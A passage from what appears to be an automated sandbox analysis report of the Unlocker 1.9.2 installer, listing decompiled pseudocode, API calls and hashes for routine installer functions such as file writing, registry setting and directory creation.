                                                                                                                                                              					if(_t39 == 0) {
                                                                                                                                                              						E004059FF(0, _t39, 0x41fc50, 0x41fc50, _a4);
                                                                                                                                                              					}
                                                                                                                                                              					_t26 = lstrlenA(0x41fc50);
                                                                                                                                                              					_a4 = _t26;
                                                                                                                                                              					if(_a8 == 0) {
                                                                                                                                                              						L6:
                                                                                                                                                              						if((_v12 & 0x00000004) == 0) {
                                                                                                                                                              							_t26 = SetWindowTextA( *0x423648, 0x41fc50); // executed
                                                                                                                                                              						}
                                                                                                                                                              						if((_v12 & 0x00000002) == 0) {
                                                                                                                                                              							_v32 = 0x41fc50;
                                                                                                                                                              							_v52 = 1;
                                                                                                                                                              							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
                                                                                                                                                              							_v44 = 0;
                                                                                                                                                              							_v48 = _t29 - _t39;
                                                                                                                                                              							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
                                                                                                                                                              							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
                                                                                                                                                              						}
                                                                                                                                                              						if(_t39 != 0) {
                                                                                                                                                              							_t28 = _a4;
                                                                                                                                                              							 *((char*)(_t28 + 0x41fc50)) = 0;
                                                                                                                                                              							return _t28;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                                                                                              						if(_t26 < 0x800) {
                                                                                                                                                              							_t26 = lstrcatA(0x41fc50, _a8);
                                                                                                                                                              							goto L6;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t26;
                                                                                                                                                              			}


















                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                                                              • lstrlenA.KERNEL32(00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                                                              • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00402F8B,00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000), ref: 00404DD7
                                                                                                                                                              • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\), ref: 00404DE9
                                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                              • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\
                                                                                                                                                              • API String ID: 2531174081-1533214826
                                                                                                                                                              • Opcode ID: c117b3df20c288d55b5a21bdd6a2c22ff4c3416e9741a057e5fe706e23abbf15
                                                                                                                                                              • Instruction ID: 7f48be0438031ac4014e4461c76190d89e96d247d5b12388d0b77bfdc4e74ae1
                                                                                                                                                              • Opcode Fuzzy Hash: c117b3df20c288d55b5a21bdd6a2c22ff4c3416e9741a057e5fe706e23abbf15
                                                                                                                                                              • Instruction Fuzzy Hash: 09216DB1E00158BBDB119FA5CD84ADEBFB9FF45354F14807AFA04B6290C7398A419B98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00402E5B(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				long _v16;
                                                                                                                                                              				long _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				char _v88;
                                                                                                                                                              				void* _t62;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				int _t66;
                                                                                                                                                              				intOrPtr _t74;
                                                                                                                                                              				long _t75;
                                                                                                                                                              				int _t78;
                                                                                                                                                              				void* _t88;
                                                                                                                                                              				intOrPtr _t91;
                                                                                                                                                              				void* _t93;
                                                                                                                                                              				long _t96;
                                                                                                                                                              				signed int _t97;
                                                                                                                                                              				long _t98;
                                                                                                                                                              				int _t99;
                                                                                                                                                              				void* _t100;
                                                                                                                                                              				long _t101;
                                                                                                                                                              				void* _t102;
                                                                                                                                                              
                                                                                                                                                              				_t97 = _a16;
                                                                                                                                                              				_t93 = _a12;
                                                                                                                                                              				_v12 = _t97;
                                                                                                                                                              				if(_t93 == 0) {
                                                                                                                                                              					_v12 = 0x8000;
                                                                                                                                                              				}
                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                              				_t88 = _t93;
                                                                                                                                                              				if(_t93 == 0) {
                                                                                                                                                              					_t88 = 0x40f020;
                                                                                                                                                              				}
                                                                                                                                                              				_t60 = _a4;
                                                                                                                                                              				if(_a4 >= 0) {
                                                                                                                                                              					_t91 =  *0x423ed8; // 0x1a434
                                                                                                                                                              					E00403080(_t91 + _t60);
                                                                                                                                                              				}
                                                                                                                                                              				_t62 = E0040304E( &_a16, 4); // executed
                                                                                                                                                              				if(_t62 == 0) {
                                                                                                                                                              					L34:
                                                                                                                                                              					_push(0xfffffffd);
                                                                                                                                                              					goto L35;
                                                                                                                                                              				} else {
                                                                                                                                                              					if((_a19 & 0x00000080) == 0) {
                                                                                                                                                              						if(_t93 == 0) {
                                                                                                                                                              							while(_a16 > 0) {
                                                                                                                                                              								_t98 = _v12;
                                                                                                                                                              								if(_a16 < _t98) {
                                                                                                                                                              									_t98 = _a16;
                                                                                                                                                              								}
                                                                                                                                                              								if(E0040304E(0x40b020, _t98) == 0) {
                                                                                                                                                              									goto L34;
                                                                                                                                                              								} else {
                                                                                                                                                              									_t66 = WriteFile(_a8, 0x40b020, _t98,  &_a12, 0); // executed
                                                                                                                                                              									if(_t66 == 0 || _t98 != _a12) {
                                                                                                                                                              										L29:
                                                                                                                                                              										_push(0xfffffffe);
                                                                                                                                                              										L35:
                                                                                                                                                              										_pop(_t63);
                                                                                                                                                              										return _t63;
                                                                                                                                                              									} else {
                                                                                                                                                              										_v8 = _v8 + _t98;
                                                                                                                                                              										_a16 = _a16 - _t98;
                                                                                                                                                              										continue;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							L45:
                                                                                                                                                              							return _v8;
                                                                                                                                                              						}
                                                                                                                                                              						if(_a16 < _t97) {
                                                                                                                                                              							_t97 = _a16;
                                                                                                                                                              						}
                                                                                                                                                              						if(E0040304E(_t93, _t97) != 0) {
                                                                                                                                                              							_v8 = _t97;
                                                                                                                                                              							goto L45;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L34;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_v16 = GetTickCount();
                                                                                                                                                              					E00405DD9(0x40af90);
                                                                                                                                                              					_t13 =  &_a16;
                                                                                                                                                              					 *_t13 = _a16 & 0x7fffffff;
                                                                                                                                                              					_a4 = _a16;
                                                                                                                                                              					if( *_t13 <= 0) {
                                                                                                                                                              						goto L45;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L9;
                                                                                                                                                              					}
                                                                                                                                                              					while(1) {
                                                                                                                                                              						L9:
                                                                                                                                                              						_t99 = 0x4000;
                                                                                                                                                              						if(_a16 < 0x4000) {
                                                                                                                                                              							_t99 = _a16;
                                                                                                                                                              						}
                                                                                                                                                              						if(E0040304E(0x40b020, _t99) == 0) {
                                                                                                                                                              							goto L34;
                                                                                                                                                              						}
                                                                                                                                                              						_a16 = _a16 - _t99;
                                                                                                                                                              						 *0x40afa8 = 0x40b020;
                                                                                                                                                              						 *0x40afac = _t99;
                                                                                                                                                              						while(1) {
                                                                                                                                                              							 *0x40afb0 = _t88;
                                                                                                                                                              							 *0x40afb4 = _v12; // executed
                                                                                                                                                              							_t74 = E00405DF9(0x40af90); // executed
                                                                                                                                                              							_v24 = _t74;
                                                                                                                                                              							if(_t74 < 0) {
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							_t100 =  *0x40afb0; // 0x7d06ee
                                                                                                                                                              							_t101 = _t100 - _t88;
                                                                                                                                                              							_t75 = GetTickCount();
                                                                                                                                                              							_t96 = _t75;
                                                                                                                                                              							if(( *0x423f34 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
                                                                                                                                                              								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                                                                                              								_t102 = _t102 + 0xc;
                                                                                                                                                              								E00404D7B(0,  &_v88); // executed
                                                                                                                                                              								_v16 = _t96;
                                                                                                                                                              							}
                                                                                                                                                              							if(_t101 == 0) {
                                                                                                                                                              								if(_a16 > 0) {
                                                                                                                                                              									goto L9;
                                                                                                                                                              								}
                                                                                                                                                              								goto L45;
                                                                                                                                                              							} else {
                                                                                                                                                              								if(_a12 != 0) {
                                                                                                                                                              									_v8 = _v8 + _t101;
                                                                                                                                                              									_v12 = _v12 - _t101;
                                                                                                                                                              									_t88 =  *0x40afb0; // 0x7d06ee
                                                                                                                                                              									L24:
                                                                                                                                                              									if(_v24 != 1) {
                                                                                                                                                              										continue;
                                                                                                                                                              									}
                                                                                                                                                              									goto L45;
                                                                                                                                                              								}
                                                                                                                                                              								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
                                                                                                                                                              								if(_t78 == 0 || _v20 != _t101) {
                                                                                                                                                              									goto L29;
                                                                                                                                                              								} else {
                                                                                                                                                              									_v8 = _v8 + _t101;
                                                                                                                                                              									goto L24;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_push(0xfffffffc);
                                                                                                                                                              						goto L35;
                                                                                                                                                              					}
                                                                                                                                                              					goto L34;
                                                                                                                                                              				}
                                                                                                                                                              			}

























                                                                                                                                                              0x00402f94
                                                                                                                                                              0x00402f97
                                                                                                                                                              0x00402fb7
                                                                                                                                                              0x00402fba
                                                                                                                                                              0x00402fbd
                                                                                                                                                              0x00402fc3
                                                                                                                                                              0x00402fc7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402fcd
                                                                                                                                                              0x00402fa3
                                                                                                                                                              0x00402fab
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402fb2
                                                                                                                                                              0x00402fb2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402fb2
                                                                                                                                                              0x00402fab
                                                                                                                                                              0x00402f92
                                                                                                                                                              0x00402fda
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402fda
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402edf

                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EB9
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F3A
                                                                                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F67
                                                                                                                                                              • wsprintfA.USER32 ref: 00402F77
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,007D06EE,00000000,00000000), ref: 00402FA3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountTick$FileWritewsprintf
                                                                                                                                                              • String ID: ... %d%%
                                                                                                                                                              • API String ID: 4209647438-2449383134
                                                                                                                                                              • Opcode ID: 6f311f0161e6b5a2b9589c42eb5a4067f1e4fce311a25467e7f14920e616ef45
                                                                                                                                                              • Instruction ID: 77f196e3f4de2b0f7ff2a56d5fa3bb7e3b28ee40e2402e388f788a2720e93e15
                                                                                                                                                              • Opcode Fuzzy Hash: 6f311f0161e6b5a2b9589c42eb5a4067f1e4fce311a25467e7f14920e616ef45
                                                                                                                                                              • Instruction Fuzzy Hash: F151917190121A9BCF10CF55DA48AAF7B78AF04795F10413BF810B72C0D7B89E50DBAA
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0040267C(struct _OVERLAPPED* __ebx) {
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				long _t32;
                                                                                                                                                              				long _t41;
                                                                                                                                                              				struct _OVERLAPPED* _t47;
                                                                                                                                                              				void* _t51;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				void* _t56;
                                                                                                                                                              				void* _t57;
                                                                                                                                                              				void* _t58;
                                                                                                                                                              
                                                                                                                                                              				_t47 = __ebx;
                                                                                                                                                              				 *(_t58 - 8) = 0xfffffd66;
                                                                                                                                                              				_t52 = E004029F6(0xfffffff0);
                                                                                                                                                              				 *(_t58 - 0x44) = _t24;
                                                                                                                                                              				if(E0040553D(_t52) == 0) {
                                                                                                                                                              					E004029F6(0xffffffed);
                                                                                                                                                              				}
                                                                                                                                                              				E00405695(_t52);
                                                                                                                                                              				_t27 = E004056B4(_t52, 0x40000000, 2);
                                                                                                                                                              				 *(_t58 + 8) = _t27;
                                                                                                                                                              				if(_t27 != 0xffffffff) {
                                                                                                                                                              					_t32 =  *0x423e94; // 0xce00
                                                                                                                                                              					 *(_t58 - 0x2c) = _t32;
                                                                                                                                                              					_t51 = GlobalAlloc(0x40, _t32);
                                                                                                                                                              					if(_t51 != _t47) {
                                                                                                                                                              						E00403080(_t47);
                                                                                                                                                              						E0040304E(_t51,  *(_t58 - 0x2c)); // executed
                                                                                                                                                              						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                                                                                                                                              						 *(_t58 - 0x30) = _t56;
                                                                                                                                                              						if(_t56 != _t47) {
                                                                                                                                                              							E00402E5B( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c)); // executed
                                                                                                                                                              							while( *_t56 != _t47) {
                                                                                                                                                              								_t49 =  *_t56;
                                                                                                                                                              								_t57 = _t56 + 8;
                                                                                                                                                              								 *(_t58 - 0x38) =  *_t56;
                                                                                                                                                              								E00405675( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                                                                                                                              								_t56 = _t57 +  *(_t58 - 0x38);
                                                                                                                                                              							}
                                                                                                                                                              							GlobalFree( *(_t58 - 0x30)); // executed
                                                                                                                                                              						}
                                                                                                                                                              						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47); // executed
                                                                                                                                                              						GlobalFree(_t51); // executed
                                                                                                                                                              						_t41 = E00402E5B(0xffffffff,  *(_t58 + 8), _t47, _t47); // executed
                                                                                                                                                              						 *(_t58 - 8) = _t41;
                                                                                                                                                              					}
                                                                                                                                                              					CloseHandle( *(_t58 + 8));
                                                                                                                                                              				}
                                                                                                                                                              				_t53 = 0xfffffff3;
                                                                                                                                                              				if( *(_t58 - 8) < _t47) {
                                                                                                                                                              					_t53 = 0xffffffef;
                                                                                                                                                              					DeleteFileA( *(_t58 - 0x44));
                                                                                                                                                              					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                                                                                                                              				}
                                                                                                                                                              				_push(_t53);
                                                                                                                                                              				E00401423();
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t58 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}













                                                                                                                                                              APIs
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000CE00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                                                                              • GlobalFree.KERNELBASE ref: 00402725
                                                                                                                                                              • WriteFile.KERNELBASE(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3294113728-0
                                                                                                                                                              • Opcode ID: 130aa79b9c983bd4e060f1967264d3b910e55c34024405a00a28679471b0e476
                                                                                                                                                              • Instruction ID: 12be5ee7c0a04460072f4a22dab7179149aa53ae67e7a866020ad89d1ba75591
                                                                                                                                                              • Opcode Fuzzy Hash: 130aa79b9c983bd4e060f1967264d3b910e55c34024405a00a28679471b0e476
                                                                                                                                                              • Instruction Fuzzy Hash: 5831C071C00128BBDF216FA5CD88EAE7E79EF04368F10423AF524762E0C7795D419BA8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 969 402303-402349 call 402aeb call 4029f6 * 2 RegCreateKeyExA 976 40288b-40289a 969->976 977 40234f-402357 969->977 979 402367-40236a 977->979 980 402359-402366 call 4029f6 lstrlenA 977->980 983 40237a-40237d 979->983 984 40236c-402379 call 4029d9 979->984 980->979 986 40238e-4023a2 RegSetValueExA 983->986 987 40237f-402389 call 402e5b 983->987 984->983 991 4023a4 986->991 992 4023a7-402483 RegCloseKey 986->992 987->986 991->992 992->976
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E00402303(void* __eax) {
                                                                                                                                                              				void* _t15;
                                                                                                                                                              				char* _t18;
                                                                                                                                                              				int _t19;
                                                                                                                                                              				long _t22;
                                                                                                                                                              				char _t24;
                                                                                                                                                              				int _t27;
                                                                                                                                                              				signed int _t30;
                                                                                                                                                              				intOrPtr _t35;
                                                                                                                                                              				void* _t37;
                                                                                                                                                              
                                                                                                                                                              				_t15 = E00402AEB(__eax);
                                                                                                                                                              				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                                                                                                                                              				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                                                                                                                                              				 *(_t37 - 0x44) = E004029F6(2);
                                                                                                                                                              				_t18 = E004029F6(0x11);
                                                                                                                                                              				_t30 =  *0x423f30; // 0x100
                                                                                                                                                              				 *(_t37 - 4) = 1;
                                                                                                                                                              				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27); // executed
                                                                                                                                                              				if(_t19 == 0) {
                                                                                                                                                              					if(_t35 == 1) {
                                                                                                                                                              						E004029F6(0x23);
                                                                                                                                                              						_t19 = lstrlenA(0x40a350) + 1;
                                                                                                                                                              					}
                                                                                                                                                              					if(_t35 == 4) {
                                                                                                                                                              						_t24 = E004029D9(3);
                                                                                                                                                              						 *0x40a350 = _t24;
                                                                                                                                                              						_t19 = _t35;
                                                                                                                                                              					}
                                                                                                                                                              					if(_t35 == 3) {
                                                                                                                                                              						_t19 = E00402E5B( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a350, 0xc00);
                                                                                                                                                              					}
                                                                                                                                                              					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a350, _t19); // executed
                                                                                                                                                              					if(_t22 == 0) {
                                                                                                                                                              						 *(_t37 - 4) = _t27;
                                                                                                                                                              					}
                                                                                                                                                              					_push( *(_t37 + 8));
                                                                                                                                                              					RegCloseKey(); // executed
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *(_t37 - 4);
                                                                                                                                                              				return 0;
                                                                                                                                                              			}













                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 00402341
                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv5446.tmp,00000023,?,?,?,00000100,?,?,?,00000011,00000002), ref: 00402361
                                                                                                                                                              • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsv5446.tmp
                                                                                                                                                              • API String ID: 1356686001-4217690468
                                                                                                                                                              • Opcode ID: dbb0ac2dea1b540987cf841eb3ee0772f6bb7d6697134c80a962b157f725af8d
                                                                                                                                                              • Instruction ID: 0c84a363429982d99d3a5a271a87b4b8d308e401ccf86a25fc22d5166c0076e5
                                                                                                                                                              • Opcode Fuzzy Hash: dbb0ac2dea1b540987cf841eb3ee0772f6bb7d6697134c80a962b157f725af8d
                                                                                                                                                              • Instruction Fuzzy Hash: 781163B1E00209BFEB10AFA4DE49EAF767CFB40358F10413AF901B61D0D6B85D019669
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES** _t10;
                                                                                                                                                              				int _t19;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t20;
                                                                                                                                                              				signed char _t22;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t23;
                                                                                                                                                              				CHAR* _t25;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES** _t29;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              
                                                                                                                                                              				_t23 = __ebx;
                                                                                                                                                              				_t25 = E004029F6(0xfffffff0);
                                                                                                                                                              				_t10 = E00405564(_t25);
                                                                                                                                                              				_t27 = _t10;
                                                                                                                                                              				if(_t10 != __ebx) {
                                                                                                                                                              					do {
                                                                                                                                                              						_t29 = E004054FB(_t27, 0x5c);
                                                                                                                                                              						 *_t29 = _t23;
                                                                                                                                                              						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                                                                                                              						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                                                                                                              						if(_t19 == 0) {
                                                                                                                                                              							if(GetLastError() != 0xb7) {
                                                                                                                                                              								L4:
                                                                                                                                                              								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t22 = GetFileAttributesA(_t25); // executed
                                                                                                                                                              								if((_t22 & 0x00000010) == 0) {
                                                                                                                                                              									goto L4;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                                                                                                              						 *_t29 = _t20;
                                                                                                                                                              						_t27 =  &(_t29[0]);
                                                                                                                                                              					} while (_t20 != _t23);
                                                                                                                                                              				}
                                                                                                                                                              				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                                                                                                              					_push(0xfffffff5);
                                                                                                                                                              					E00401423();
                                                                                                                                                              				} else {
                                                                                                                                                              					E00401423(0xffffffe6);
                                                                                                                                                              					E004059DD("C:\\Program Files\\Unlocker", _t25);
                                                                                                                                                              					SetCurrentDirectoryA(_t25); // executed
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t30 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}












                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00405316,?,C:\,00000000,004055C8,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405572
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
                                                                                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586
                                                                                                                                                              • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Program Files\Unlocker,00000000,00000000,000000F0), ref: 00401622
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Program Files\Unlocker, xrefs: 00401617
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
